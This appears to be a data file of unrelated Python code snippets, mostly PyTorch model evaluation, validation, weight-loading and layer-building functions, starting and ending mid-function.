zip(true_masks, mask_pred):\n pred = (pred > threshold).float()\n if net.n_classes > 1:\n dice += F.cross_entropy(pred.unsqueeze(dim=0), true_mask.unsqueeze(dim=0)).item()\n else:\n dice += dice_coeff(pred, true_mask.squeeze(dim=1)).item()\n pred = pred.detach().cpu().numpy()\n pred = pred.astype(int)\n pred = np.matrix.flatten(pred)\n\n true_mask = true_mask.cpu().numpy()\n true_mask = true_mask.astype(int)\n true_mask = np.matrix.flatten(true_mask)\n\n jacc_score += jaccard_score(true_mask, pred)\n acc_score += accuracy_score(true_mask, pred)\n pres_score += precision_score(true_mask, pred)\n rec_score += recall_score(true_mask, pred)\n\n dice = (dice / (len(loader) * batch_size))\n jacc_score = (jacc_score / (len(loader) * batch_size))\n acc_score = (acc_score / (len(loader) * batch_size))\n pres_score = (pres_score / (len(loader) * batch_size))\n rec_score = (rec_score / (len(loader) * batch_size))\n if (pres_score + rec_score) > 0:\n f1_score = 2 * (pres_score * rec_score) / (pres_score + rec_score)\n else:\n f1_score = 0\n\n print(\"Dice: \", dice)\n print(\"Jaccard_score: \", jacc_score)\n print(\"Accuracy: \", acc_score)\n print(\"Precision: \", pres_score)\n print(\"Recall: \", rec_score)\n print(\"F1_score: \", f1_score)\n return dice, jacc_score, acc_score, pres_score, rec_score, f1_score", "def framework_load_weights(self):\n omit_modules = cfg.get('omit_modules_from_loading', [])\n\n for dest_module_path, path in self.get_load_paths():\n _print(\"Loading submodule \\\"{}\\\" from {}.\".format(dest_module_path, path))\n\n if \":\" in path:\n source_module_path, source_path = path.split(':')\n else:\n source_path = path\n source_module_path = dest_module_path\n\n start = time.time()\n\n device = get_pytorch_device()\n\n loaded_state_dict = torch.load(source_path, map_location=device)['model']\n\n if source_module_path:\n source_module_path_with_sep = source_module_path + '.'\n\n loaded_state_dict = type(loaded_state_dict)(\n {k: v for k, v in loaded_state_dict.items() if k.startswith(source_module_path_with_sep)}\n )\n\n assert loaded_state_dict, (\n f\"File contains no tensors with prefix `{source_module_path_with_sep}` (file: {source_path})\"\n )\n\n if dest_module_path != source_module_path:\n # Rename variables from the loaded state dict by replacing `source_module_path` with `dest_module_path`.\n\n _source_module_path = source_module_path + '.' if source_module_path else source_module_path\n _dest_module_path = dest_module_path + '.' if dest_module_path else dest_module_path\n\n loaded_state_dict = {\n k.replace(_source_module_path, _dest_module_path, 1): v\n for k, v in loaded_state_dict.items()\n }\n\n module = self.updater.model\n\n state_dict = module.state_dict()\n\n intersection = set(state_dict.keys()) & set(loaded_state_dict.keys())\n\n if not intersection:\n raise Exception(\n f\"Loading variables with spec ({dest_module_path}, {path}) \"\n f\"would have no effect (no variables found).\"\n )\n loaded_state_dict = {k: loaded_state_dict[k] for k in intersection}\n\n if omit_modules:\n omitted_variables = {\n k: v for k, v in loaded_state_dict.items()\n if any(k.startswith(o) for o in omit_modules)\n }\n\n print(\"Omitting the following variables from loading:\")\n describe_structure(omitted_variables)\n\n loaded_state_dict = {\n k: v for k, v in loaded_state_dict.items()\n if k not in omitted_variables\n }\n\n _print(\"Loading variables:\")\n describe_structure(loaded_state_dict)\n\n state_dict.update(loaded_state_dict)\n\n module.load_state_dict(state_dict, strict=True)\n\n _print(\"Done loading weights for module {}, took {} seconds.\".format(dest_module_path, time.time() - start))", "def run_inference(model: torch.nn.Module,\n model_inputs: Dict[str, torch.Tensor]) -> list:\n return model(**model_inputs, return_loss=False)", "def forward(self, features):\n outputs = {} \n #features = self.bn(self.linear(features))\n for i in range(len(self.module_list)): \n x = self.module_list[i](features)\n outputs[i] = x\n\n return outputs", "def load_cnns(self):\n self.cnn1 = cnn_utils.CNN()\n self.cnn1.load_state_dict(torch.load(f'{self.model_dir}/model1.pt'))\n self.cnn1.eval()\n self.cnn2 = cnn_utils.CNN()\n self.cnn2.load_state_dict(torch.load(f'{self.model_dir}/model2.pt'))\n self.cnn2.eval()", "def eval_net(net, loader, device, n_val, cfg):\n net.eval()\n tot = 0\n bce_loss = 0\n dice_coef = 0\n with tqdm(total=n_val, desc='Validation round', unit='img', leave=False) as pbar:\n for imgs, true_masks in loader:\n # for batch in loader:\n # imgs = batch['image']\n # true_masks = batch['mask']\n\n imgs = imgs.to(device=device, dtype=torch.float32)\n mask_type = torch.float32 #if cfg.n_classes == 1 else torch.long\n true_masks = true_masks.to(device=device, dtype=mask_type)\n criterion_1 = BCE = F.binary_cross_entropy #(inputs, targets, reduction='mean')#StableBCELoss()#binary_xloss\n criterion_2 = DiceLoss()\n # compute loss\n if cfg.deepsupervision:\n masks_preds = net(imgs)\n for masks_pred in masks_preds:\n tot_ = 0\n tot_bce = 0\n tot_dice = 0\n for true_mask, pred in zip(true_masks, masks_pred):\n pred = (pred > cfg.out_threshold).float()\n if cfg.n_classes > 1:\n bce = criterion_1(F.sigmoid(pred), true_mask) \n dice = criterion_2(pred, true_mask.float())\n # sub_cross_entropy = F.cross_entropy(pred, true_mask).item()\n # sub_cross_entropy = F.cross_entropy(pred.unsqueeze(dim=0), true_mask.unsqueeze(dim=0).squeeze(1)).item()\n else:\n sub_cross_entropy = dice_coeff(pred, true_mask.squeeze(dim=1)).item()\n tot_bce += bce\n tot_dice += dice\n tot_bce = tot_bce / len(masks_preds)\n tot_dice = tot_dice / len(masks_preds)\n bce_loss += tot_bce\n dice_coef += tot_dice\n tot_ += tot_bce\n tot_ += tot_dice\n tot += tot_\n else:\n masks_pred = net(imgs)\n for true_mask, pred in zip(true_masks, masks_pred):\n pred = (pred > cfg.out_threshold).float()\n if cfg.n_classes > 1:\n tot += F.cross_entropy(pred.unsqueeze(dim=0), true_mask.unsqueeze(dim=0).squeeze(1)).item()\n else:\n tot += dice_coeff(pred, true_mask.squeeze(dim=1)).item()\n\n pbar.update(imgs.shape[0])\n\n return tot / n_val, bce_loss / n_val, dice_coef / n_val,", "def set_module_trainable(module: nn.Module, mode: bool) -> None:\n for param in module.parameters():\n param.requires_grad = mode", "def train_and_eval(self):\n self.__create_indexes()\n model = None\n model = None\n if self.model == 'OMult':\n model = OMult(self.kwargs)\n elif self.model == 'ConvO':\n model = ConvO(self.kwargs)\n elif self.model == 'QMult':\n model = QMult(self.kwargs)\n elif self.model == 'ConvQ':\n model = ConvQ(self.kwargs)\n elif self.model == 'OMultBatch':\n model = OMultBatch(self.kwargs)\n elif self.model == 'ConvOBatch':\n model = ConvOBatch(self.kwargs)\n elif self.model == 'QMultBatch':\n model = QMultBatch(self.kwargs)\n elif self.model == 'ConvQBatch':\n model = ConvQBatch(self.kwargs)\n else:\n print(self.model, ' is not valid name')\n raise ValueError\n\n self.train(model)\n self.eval(model)", "def train(self, mode=True):\n nn.Module.train(self, mode)\n\n if mode:\n # Set all bn layers in backbone to eval mode\n def set_bn_eval(m):\n classname = m.__class__.__name__\n if classname.find(\"BatchNorm\") != -1:\n m.eval()\n\n self.backbone.apply(set_bn_eval)", "def test_model(model: nn.Module, test_set: data.DataLoader, number_of_classes: int) -> Tuple[score.FloatScore, score.DictScore]:\n # model.eval is used for ImageNet models, batchnorm or dropout layers will work in eval mode.\n model.eval()\n\n def test_average() -> score.FloatScore:\n correct = 0\n total = 0\n\n with torch.set_grad_enabled(False):\n for (inputs, yreal) in tqdm(test_set, unit=\"images\", desc=\"Testing model (average)\", leave=True, ascii=True):\n inputs, yreal = inputs.cuda(), yreal.cuda()\n\n ypred = model(inputs)\n _, predicted = torch.max(ypred.data, 1)\n\n total += yreal.size(0)\n correct += (predicted == yreal).sum().item()\n\n accuracy = 100 * correct / total\n log.info(\"Accuracy of the network on the {} test images (average): {}\".format(total, accuracy))\n with open('epoch_logs.txt', 'a+') as file:\n file.write('Test Acc: {}\\n'.format(accuracy))\n return score.FloatScore(accuracy)\n\n def test_per_class() -> score.DictScore:\n class_correct = list(0. for _ in range(number_of_classes))\n class_total = list(0. for _ in range(number_of_classes))\n total = 0\n\n with torch.no_grad():\n for (inputs, yreal) in tqdm(test_set, unit=\"images\", desc=\"Testing model (per class)\", leave=True, ascii=True):\n inputs, yreal = inputs.cuda(), yreal.cuda()\n\n total += yreal.size(0)\n\n ypred = model(inputs)\n _, predicted = torch.max(ypred, 1)\n c = (predicted == yreal).squeeze()\n for i in range(yreal.shape[0]):\n label = yreal[i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n\n log.info(\"Accuracy of the network on the {} test images (per-class):\".format(total))\n\n per_class_accuracy = {}\n for i in range(number_of_classes):\n accuracy = 100 * class_correct[i] / (class_total[i] + 0.0001)\n per_class_accuracy[i] = accuracy\n print('Accuracy of %5s : %2d %%' % (\n i, accuracy))\n\n return score.DictScore(per_class_accuracy)\n\n return test_average(), test_per_class()", "def eval(self):\n\n # parameters initialize\n torch = import_optional_dependency(\"torch\")\n eval_total = 0\n eval_correct = 0\n eval_loss = 0\n self._set_eval()\n\n # display the information\n if self.info:\n print(f\"\\rEvaluating...\", end=\"\")\n\n # start eval part\n for i, (source, target) in enumerate(self.eval_dataset):\n # send data to device\n source = source.to(self.device)\n target = target.to(self.device)\n\n result = self.model(source)\n eval_loss += self.criterion(result, target).item()\n _, predicted = torch.max(result.data, 1)\n eval_total += target.size(0)\n eval_correct += (predicted == target).sum().item()\n\n accuracy = eval_correct / eval_total\n eval_loss = eval_loss / eval_total\n\n if self.info:\n print(f\"\\rEvaluation loss: { eval_loss } | Accuracy: { accuracy }\")\n\n return eval_loss, accuracy", "def evaluate(data_loader, model, device):\n model.eval()\n\n loss_ = []\n with torch.no_grad():\n for idx, batch in enumerate(data_loader):\n data = batch.to(device)\n outputs = model.forward(data)\n loss_.append(F.l1_loss(outputs, data).data.numpy())\n\n return np.mean(loss_)", "def load_modules(bot, config):\n for item in MODULES:\n importlib.import_module(\"cogs.\" + item).setup(bot, config)", "def validate_kitti(model, args, eval_loader, group, iters=24):\n model.eval()\n epe_list = torch.zeros(2).cuda(device=args.gpu)\n out_list = torch.zeros(2).cuda(device=args.gpu)\n\n for val_id, batch in enumerate(tqdm(eval_loader)):\n image1, image2, flow_gt, valid_gt = batch\n\n image1 = Variable(image1, requires_grad=True)\n image1 = image1.cuda(args.gpu, non_blocking=True)\n\n image2 = Variable(image2, requires_grad=True)\n image2 = image2.cuda(args.gpu, non_blocking=True)\n\n flow_gt = Variable(flow_gt, requires_grad=True)\n flow_gt = flow_gt.cuda(args.gpu, non_blocking=True)\n flow_gt = flow_gt[0]\n\n valid_gt = Variable(valid_gt, requires_grad=True)\n valid_gt = valid_gt.cuda(args.gpu, non_blocking=True)\n valid_gt = valid_gt[0]\n\n padder = InputPadder(image1.shape, mode='kitti')\n image1, image2 = padder.pad(image1, image2)\n\n flow_low, flow_pr = model(image1, image2, iters=iters, test_mode=True)\n flow = padder.unpad(flow_pr[0])\n\n epe = torch.sum((flow - flow_gt)**2, dim=0).sqrt()\n mag = torch.sum(flow_gt**2, dim=0).sqrt()\n\n epe = epe.view(-1)\n mag = mag.view(-1)\n val = valid_gt.view(-1) >= 0.5\n\n out = ((epe > 3.0) & ((epe/mag) > 0.05)).float()\n\n epe_list[0] += epe[val].mean().item()\n epe_list[1] += 1\n\n out_list[0] += out[val].sum()\n out_list[1] += torch.sum(val)\n\n if args.distributed:\n dist.all_reduce(tensor=epe_list, op=dist.ReduceOp.SUM, group=group)\n dist.all_reduce(tensor=out_list, op=dist.ReduceOp.SUM, group=group)\n\n if args.gpu == 0:\n epe = epe_list[0] / epe_list[1]\n f1 = 100 * out_list[0] / out_list[1]\n\n print(\"Validation KITTI: %f, %f\" % (epe, f1))\n return {'kitti-epe': float(epe.detach().cpu().numpy()), 'kitti-f1': float(f1.detach().cpu().numpy())}\n else:\n return None", "def _conventional_precalculation(self):\n # Run all modules\n for module in self._conventional_modules:\n module.compute()", "def test_versioned_symbols(self):\n class MyModule(torch.nn.Module):\n def __init__(self):\n super(MyModule, self).__init__()\n\n def forward(self, a, b, alpha: float):\n no_alpha = torch._test_serialization_subcmul(a, b)\n with_alpha = torch._test_serialization_subcmul(a, b, alpha)\n return no_alpha, with_alpha\n\n def historic_subcmul(a, b, alpha=2):\n return b - alpha * a\n\n def current_subcmul(a, b, alpha=1):\n return a - alpha * b\n\n # Loads and verifies the historic behavior of the module\n # that was serialized with version 2\n module_v2 = torch.jit.load(pytorch_test_dir + \"/jit/fixtures/_test_serialization_subcmul_v2.pt\")\n a = torch.randn((5,))\n b = torch.randn((5,))\n alpha = random.random()\n args = (a, b, alpha)\n no_alpha_v2, with_alpha_v2 = module_v2(*args)\n self.assertEqual(no_alpha_v2, historic_subcmul(a, b))\n self.assertEqual(with_alpha_v2, historic_subcmul(*args))\n\n # Scripts, saves, loads and verifies the current behavior of the module\n scripted_module = torch.jit.script(MyModule())\n buffer = io.BytesIO()\n torch.jit.save(scripted_module, buffer)\n buffer.seek(0)\n module_current = torch.jit.load(buffer)\n no_alpha_current, with_alpha_current = module_current(*args)\n self.assertEqual(no_alpha_current, current_subcmul(a, b))\n self.assertEqual(with_alpha_current, current_subcmul(*args))", "def _evaluate_during_fit(self, test_loader, epoch):", "def blocks2modules(blocks, net_info, device=\"cpu\"):\n modules = torch.nn.ModuleList()\n\n # Track number of channels (filters) in the output of each layer; this\n # is necessary to determine layer input/output shapes for various layers.\n curr_out_channels = None\n prev_layer_out_channels = net_info[\"channels\"]\n out_channels_list = []\n\n for i, block in enumerate(blocks):\n module = torch.nn.Sequential()\n\n if block[\"type\"] == \"convolutional\":\n batch_normalize = \"batch_normalize\" in block\n bias = not batch_normalize\n kernel_size = block[\"size\"]\n padding = (kernel_size - 1) // 2 if \"pad\" in block else 0\n in_channels = prev_layer_out_channels\n out_channels = block[\"filters\"]\n\n conv = torch.nn.Conv2d(\n in_channels=in_channels, out_channels=out_channels,\n kernel_size=kernel_size, stride=block[\"stride\"],\n padding=padding, bias=bias\n )\n module.add_module(\"conv_{}\".format(i), conv)\n\n if batch_normalize:\n bn = torch.nn.BatchNorm2d(num_features=out_channels)\n module.add_module(\"batch_norm_{}\".format(i), bn)\n\n if block[\"activation\"] == \"leaky\":\n acti = torch.nn.LeakyReLU(negative_slope=0.1, inplace=True)\n module.add_module(\"leaky_{}\".format(i), acti)\n elif block[\"activation\"] == \"linear\":\n # NOTE: Darknet src files call out \"linear\" vs \"relu\" but we\n # use ReLU here.\n acti = torch.nn.ReLU(inplace=True)\n\n # Update the number of current (output) channels.\n curr_out_channels = out_channels\n\n elif block[\"type\"] == \"maxpool\":\n stride = block[\"stride\"]\n maxpool = MaxPool2d(\n kernel_size=block[\"size\"], stride=stride\n )\n module.add_module(\"maxpool_{}\".format(i), maxpool)\n\n elif block[\"type\"] == \"route\":\n # Route layer concatenates outputs along channel dim; add dummy\n # layer and handle the actual logic in Darknet.forward().\n module.add_module(\"route_{}\".format(i), DummyLayer())\n\n out_channels = sum(\n out_channels_list[layer_idx] for layer_idx in block[\"layers\"]\n )\n\n curr_out_channels = out_channels\n\n elif block[\"type\"] == \"shortcut\":\n # Shortcut layer sums outputs from previous layers; add dummy\n # layer and handle the actual logic in Darknet.forward().\n module.add_module(\"shortcut_{}\".format(i), DummyLayer())\n\n if \"activation\" in block:\n if block[\"activation\"] == \"leaky\":\n acti = torch.nn.LeakyReLU(negative_slope=0.1, inplace=True)\n module.add_module(\"leaky_{}\".format(i), acti)\n elif block[\"activation\"] == \"linear\":\n acti = torch.nn.ReLU(inplace=True)\n\n assert out_channels == out_channels_list[i + block[\"from\"]]\n curr_out_channels = out_channels\n\n elif block[\"type\"] == \"upsample\":\n # NOTE: torch.nn.Upsample is deprecated in favor of Interpolate;\n # consider using this and/or other interpolation methods?\n upsample = torch.nn.Upsample(\n scale_factor=block[\"stride\"], mode=\"nearest\"\n )\n module.add_module(\"upsample_{}\".format(i), upsample)\n\n elif block[\"type\"] == \"yolo\":\n yolo = YOLOLayer(block[\"anchors\"], block[\"mask\"], device=device)\n module.add_module(\"yolo_{}\".format(i), yolo)\n\n modules.append(module)\n prev_layer_out_channels = curr_out_channels\n out_channels_list.append(curr_out_channels)\n\n return modules", "def modules():", "def eval(self, feats):\n raise NotImplementedError", "def eval_all(folder):\n optimizers = [\n tf.keras.optimizers.Adadelta(learning_rate=0.01),\n tf.keras.optimizers.Adagrad(learning_rate=0.002),\n tf.keras.optimizers.Adam(learning_rate=0.0001),\n tf.keras.optimizers.Adamax(learning_rate=0.0005),\n tf.keras.optimizers.Ftrl(learning_rate=0.002),\n tf.keras.optimizers.Nadam(learning_rate=0.001),\n tf.keras.optimizers.RMSprop(learning_rate=0.0005),\n tf.keras.optimizers.SGD(learning_rate=0.003),\n ]\n\n epochs = [\n 500, 120, 80, 150, 300, 60, 100, 500\n ]\n\n biased_randomized = [\n (models.DefaultModel, False),\n (models.BiasedModel, False),\n (models.NeuralModel, False),\n (models.DefaultModel, True),\n (models.BiasedModel, True),\n (models.NeuralModel, True),\n ]\n\n for optimizer, n_epochs in zip(optimizers, epochs):\n for model, rndmz in biased_randomized:\n eval_optimizer(folder,\n model,\n optimizer,\n n_epochs,\n rndmz)", "def initialize_models(self): \n state_shape = list(self.env.observation_space.shape)\n img_height, img_width, n_channels = state_shape\n num_actions = self.env.action_space.n\n print(\"img_height: \", img_height)\n print(\"img_width: \", img_width)\n print(\"n_channels: \", n_channels)\n print(\"n_actions: \", num_actions)\n\n ##############################################################\n ################ YOUR CODE HERE - 25-30 lines lines ################\n modules = OrderedDict()\n\n # def conv_output_shape(h_w, kernel_size=1, stride=1, pad=0, dilation=1): -> h,w \n pad1 = (3 * img_height - 4 + 8) // 2\n modules['0'] = nn.Conv2d(n_channels * self.config.state_history, 32, 8, stride=4, padding=pad1)\n modules['relu1'] = nn.ReLU()\n out1h, out1w = conv_output_shape((img_height, img_width), kernel_size=8, stride=4, pad=pad1, dilation=1)\n\n pad2 = (out1w + 2) // 2\n modules['2'] = nn.Conv2d(32, 64, 4, stride=2, padding=pad2)\n modules['relu3'] = nn.ReLU()\n out2h, out2w = conv_output_shape((out1h, out1w), kernel_size=4, stride=2, pad=pad2, dilation=1)\n\n pad3 = 1\n modules['4'] = nn.Conv2d(64, 64, 3, stride=1, padding=pad3)\n modules['relu5'] = nn.ReLU()\n out3h, out3w = conv_output_shape((out2h, out2w), kernel_size=3, stride=1, pad=pad3, dilation=1)\n\n modules['flatten'] = nn.Flatten()\n modules['fc'] = nn.Linear(out3h*out3w*64, num_actions)\n self.q_network = nn.Sequential(modules)\n\n target_modules = OrderedDict()\n target_modules['t_layer1'] = nn.Conv2d(n_channels * self.config.state_history, 32, 8, stride=4, padding=pad1)\n target_modules['t_relu1'] = nn.ReLU()\n target_modules['t_layer2'] = nn.Conv2d(32, 64, 4, stride=2, padding=pad2)\n target_modules['t_relu2'] = nn.ReLU()\n target_modules['t_layer3'] = nn.Conv2d(64, 64, 3, stride=1, padding=pad3)\n target_modules['t_relu3'] = nn.ReLU()\n target_modules['t_flatten'] = nn.Flatten()\n target_modules['t_fc'] = nn.Linear(out3h*out3w*64, num_actions)\n self.target_network = nn.Sequential(target_modules)\n\n ##############################################################\n ######################## END YOUR CODE #######################", "def test_all_activations_work():\n nn_instance = RNN(layers_info=[[\"lstm\", 20], [\"gru\", 10], [\"linear\", 20], [\"linear\", 1]],\n hidden_activations=\"relu\", output_activation=None, dropout=0.0000001,\n initialiser=\"xavier\", input_dim=15)\n for key in nn_instance.str_to_activations_converter.keys():\n if key == \"none\": hidden_key = \"relu\"\n else: hidden_key = key\n model = RNN(layers_info=[[\"lstm\", 20], [\"gru\", 10], [\"linear\", 20], [\"linear\", 1]],\n hidden_activations=hidden_key, output_activation=key, dropout=0.0000001,\n initialiser=\"xavier\", input_dim=15)\n model(X)", "def set_eval(self):\n self.model.eval()", "def validation(model: nn.Module, criterion, valid_loader, num_classes): \n \n with torch.no_grad():\n model.eval()\n losses = []\n dice=[]\n iou=[]\n for inputs, targets,_ in valid_loader:\n inputs = utils.cuda(inputs)\n targets = utils.cuda(targets)\n outputs,_,_ = model(inputs)\n loss = criterion(outputs, targets)\n losses.append(loss.item())\n output_classes = outputs.data.cpu().numpy().argmax(axis=1)\n target_classes = targets.data.cpu().numpy().argmax(axis=1)\n dice += [general_dice(target_classes, output_classes)]\n iou += [general_jaccard(target_classes, output_classes)]\n\n valid_loss = np.mean(losses)\n average_iou = np.mean(iou)\n average_dices = np.mean(dice)\n\n print('Valid loss: {:.4f}, average IoU: {:.4f}, average Dice: {:.4f}'.format(valid_loss, average_iou, average_dices))\n\n return [valid_loss, average_iou]", "def eval_model(\n self,\n model: nn.Module,\n batch_size: int = 32,\n data: Union[str, th.utils.data.Dataset] = \"test\",\n collate_fn: Optional[Callable] = None,\n by_example: bool = False,\n label_map: Optional[Callable] = None,\n nll: bool = False,\n ):\n # Set model to test mode\n mode = model.training\n model.train(mode=False)\n # Select dataset for evaluation\n dataset = data\n if isinstance(data, str):\n dataset = self.get_split(data)\n elif not isinstance(dataset, th.utils.data.Dataset):\n raise ValueError(\n \"`data` must be a pytorch dataset or one of 'dev'/'valid'\"\n f\"/'test/'train', got {dataset.__class__.__name__} instead\"\n )\n # Dataloader\n data_loader = DataLoader(\n dataset,\n batch_size=batch_size,\n collate_fn=self.collate_fn if collate_fn is None else collate_fn,\n )\n y, y_hat, all_nlls = [], [], []\n for batch in data_loader:\n # Get model predictions\n with th.no_grad():\n nlls, _, predicted = self.nll(\n model,\n batch,\n reduction=\"none\",\n predict=True,\n )\n # Track predictions and reference\n y.append(batch[-1])\n y_hat.append(predicted)\n all_nlls.append(nlls)\n # Concatenate\n y = th.cat(y, dim=0).cpu()\n y_hat = th.cat(y_hat, dim=0).cpu()\n all_nlls = th.cat(all_nlls, dim=0).cpu()\n # Map predictions to labels (this is useful for single\n # head model evaluated on multiple tasks)\n if label_map:\n y_hat = th.tensor([label_map(y_hat_i.item()) for y_hat_i in y_hat])\n # Task specific score\n if by_example:\n score = (y == y_hat).float()\n else:\n score = self.score(y_hat, y)\n nlls = nlls.mean()\n # Reset model to the original mode\n model.train(mode=mode)\n\n result = score\n if nll:\n result = (score, all_nlls)\n return result", "def forward(self, x):\n result = x\n for module in self.modules:\n result = module.forward(result)\n return result", "def evaluate(args, model, tokenizer, eval_dataset, eval_dataloader, task_name, model_type, split, step):\n model.eval()\n processor = MoralStoriesProcessor()\n results = dict()\n softmax = torch.nn.Softmax(dim=1)\n\n # Eval!\n logger.info('***** Running evaluation on the validation / test set *****')\n logger.info(' Num examples = %d', len(eval_dataset))\n logger.info(' Batch size = %d', args.eval_batch_size)\n batch_losses = list()\n eval_loss = 0.0\n micro_loss, macro_loss = 0.0, 0.0\n num_batches, num_tokens = 0, 0\n preds = None\n soft_preds = None\n out_label_ids = None\n # Perform a single evaluation step\n for batch in tqdm(eval_dataloader, desc='Evaluating', mininterval=10, ncols=100):\n batch = tuple(t.to(args.device) for t in batch)\n with torch.no_grad():\n if 'gen' not in task_name:\n inputs = {'input_ids': batch[0],\n 'attention_mask': batch[1],\n 'token_type_ids': batch[2] if model_type == 'bert' else None,\n 'labels': batch[3]}\n else:\n inputs = {'input_ids': batch[0],\n 'attention_mask': batch[1],\n 'labels': batch[3]}\n if 'gpt2' not in model_type:\n # Prepare decoder inputs and labels for enc-dec models\n inputs['labels'] = batch[3][:, 1:].contiguous() # shift\n decoder_input_ids = batch[3][:, :-1].clone() # shift\n decoder_input_ids[decoder_input_ids == -100] = tokenizer.pad_token_id # remove masking\n inputs['decoder_input_ids'] = decoder_input_ids.contiguous()\n\n outputs = model(**inputs)\n\n tmp_eval_loss, logits = outputs[:2]\n soft_logits = softmax(logits)\n eval_loss += tmp_eval_loss.mean().item()\n batch_losses.append(tmp_eval_loss.item())\n\n if 'gen' not in task_name:\n if preds is None:\n preds = logits.detach().cpu().numpy()\n soft_preds = soft_logits.detach().cpu().numpy()\n out_label_ids = inputs['labels'].detach().cpu().numpy()\n else:\n preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)\n soft_preds = np.append(soft_preds, soft_logits.detach().cpu().numpy(), axis=0)\n out_label_ids = np.append(out_label_ids, inputs['labels'].detach().cpu().numpy(), axis=0)\n else:\n # Obtain per-token loss for perplexity computation\n batch_loss = get_token_loss(args, logits, batch[3], batch[4], model_type=model_type)\n macro_loss += batch_loss.mean().item()\n micro_loss += batch_loss.sum().item()\n num_batches += 1\n num_tokens += batch_loss.view(-1).shape[0]\n\n # Compute and update evaluation metric values\n if 'gen' not in task_name:\n # Isolate model predictions\n preds = np.argmax(preds, axis=1)\n soft_preds = soft_preds.tolist()\n curr_result = compute_cls_metrics(preds, out_label_ids)\n else:\n macro_perplexity = torch.exp(torch.tensor(macro_loss / num_batches)).item()\n micro_perplexity = torch.exp(torch.tensor(micro_loss / num_tokens)).item()\n curr_result = {'macro_perplexity': macro_perplexity,\n 'micro_perplexity': micro_perplexity}\n\n if len(results.keys()) == 0:\n for k, v in curr_result.items():\n results[k] = [v]\n else:\n for k, v in curr_result.items():\n results[k].append(v)\n\n # Log metrics\n output_eval_file = os.path.join(args.output_dir, 'results_{}_{}.txt'.format(task_name, split))\n with open(output_eval_file, 'a') as writer:\n logger.info('***** Eval results *****')\n writer.write('STEP: {:s}\\n'.format(str(step)))\n for key in sorted(curr_result.keys()):\n logger.info(' %s = %s', key, str(curr_result[key]))\n writer.write('%s = %s\\n' % (key, str(curr_result[key])))\n\n # Log predictions\n if 'gen' not in task_name:\n output_pred_file = \\\n os.path.join(args.output_dir, 'predictions_{}_{}_{}.lst'.format(task_name, split, step))\n with open(output_pred_file, 'w') as writer:\n logger.info('***** Write predictions *****')\n for pred in preds:\n writer.write('{}\\n'.format(processor.get_labels()[pred]))\n\n # Maintain a single metrics file\n if os.path.exists(args.output_dir):\n with open(os.path.join(args.output_dir, 'metrics_{}_{}.json'.format(task_name, split)), 'w') as f:\n f.write(json.dumps(results))\n f.close()\n\n # Report mean dev loss\n mean_eval_loss = eval_loss / len(eval_dataloader)\n logging.info('\\n' + '*' * 10)\n logging.info('Mean development loss: {:.4f}'.format(mean_eval_loss))\n logging.info('*' * 10 + '\\n')\n\n return results, mean_eval_loss, preds, soft_preds", "def execute_module(self):\n raise NotImplementedError", "def test(self):\n self.eval()", "def check_norm_state(modules, train_state):\n for mod in modules:\n if isinstance(mod, _BatchNorm):\n if mod.training != train_state:\n return False\n return True", "def __modules_recurse(self, mod=None):\n if mod is None:\n mod = self\n for module in mod.children():\n if isinstance(module, (nn.ModuleList, nn.Sequential, self.custom_layers)):\n yield from self.__modules_recurse(module)\n else:\n yield module", "def test(eval_loader, model, criterion, epoch, device, config, tf_writer, prepare_embeddings_fn, embedder):\n\n model.eval() # eval mode disables dropout\n\n losses = AverageMeter() # cross entropy loss\n accs = AverageMeter() # accuracies\n\n # Batches\n for _, data in enumerate(eval_loader):\n\n # Perform embedding + padding\n embeddings, labels = prepare_embeddings_fn(data, embedder, device, config)\n\n # Forward prop.\n output = model(embeddings)\n\n # Perform regularization on embedding weights -- not all models support this\n if config.model.use_regularization == \"none\":\n loss = criterion(output[\"logits\"].to(device), labels)\n elif config.model.use_regularization == \"l1\":\n # Regularization on embedding weights\n emb_weights_norm = torch.norm(model.emb_weights, p=1)\n # Loss\n loss = criterion(output[\"logits\"].to(device), labels) + config.model.regularization_lambda * emb_weights_norm # scalar\n else:\n raise NotImplementedError(\"Regularization other than 'none' or 'l1' not supported\")\n\n # Find accuracy\n _, predictions = output[\"logits\"].max(dim=1) # (n_documents)\n correct_predictions = torch.eq(predictions, labels).sum().item()\n accuracy = correct_predictions / labels.size(0)\n\n # Keep track of metrics\n losses.update(loss.item(), labels.size(0))\n accs.update(accuracy, labels.size(0))\n \n try:\n for sentence in data:\n sentence.clear_embeddings()\n except:\n pass\n\n # Print eval status\n print('Evaluation:\\t'\n 'Eval Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Eval Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format(loss=losses, acc=accs), flush=True)\n\n # Log the running loss, accuracy\n tf_writer.add_scalar('test loss (avg. epoch)', losses.avg, epoch)\n tf_writer.add_scalar('test accuracy (avg. epoch)', accs.avg, epoch)", "def run(self, task):\n params = self.params\n\n # task parameters\n self.task = task\n params.out_features = N_CLASSES[task]\n self.is_classif = task != 'STS-B'\n\n # load data\n self.data = self.load_data(task)\n if not self.data['dico'] == self._embedder.dico:\n raise Exception((\"Dictionary in evaluation data (%i words) seems different than the one \" +\n \"in the pretrained model (%i words). Please verify you used the same dictionary, \" +\n \"and the same values for max_vocab and min_count.\") % (len(self.data['dico']), len(self._embedder.dico)))\n\n # embedder\n self.embedder = copy.deepcopy(self._embedder)\n self.embedder.npu()\n\n # projection layer\n self.proj = nn.Sequential(*[\n nn.Dropout(params.dropout),\n nn.Linear(self.embedder.out_dim, params.out_features)\n ]).npu()\n\n # optimizers\n self.optimizer_e = get_optimizer(list(self.embedder.get_parameters(params.finetune_layers)), params.optimizer_e)\n self.optimizer_p = get_optimizer(self.proj.parameters(), params.optimizer_p)\n\n # train and evaluate the model\n for epoch in range(params.n_epochs):\n\n # update epoch\n self.epoch = epoch\n\n # training\n logger.info(\"GLUE - %s - Training epoch %i ...\" % (task, epoch))\n self.train()\n\n # evaluation\n logger.info(\"GLUE - %s - Evaluating epoch %i ...\" % (task, epoch))\n with torch.no_grad():\n scores = self.eval('valid')\n self.scores.update(scores)\n self.eval('test')", "def test_one_epoch_model(self, model: nn.Module) -> Tuple[float, Dict[str, float]]:\n losses = []\n l1_criterion = nn.L1Loss()\n model.eval()\n\n # testloaders contain same length(iteration) of batch dataset\n for sample_batched in progressbar(self.testloader, prefix=\"[Test]\\t\"):\n image = torch.autograd.Variable(sample_batched['image'].cuda())\n depth = torch.autograd.Variable(sample_batched['depth'].cuda(non_blocking=True))\n maxDepth = 1000.0\n depth_n = 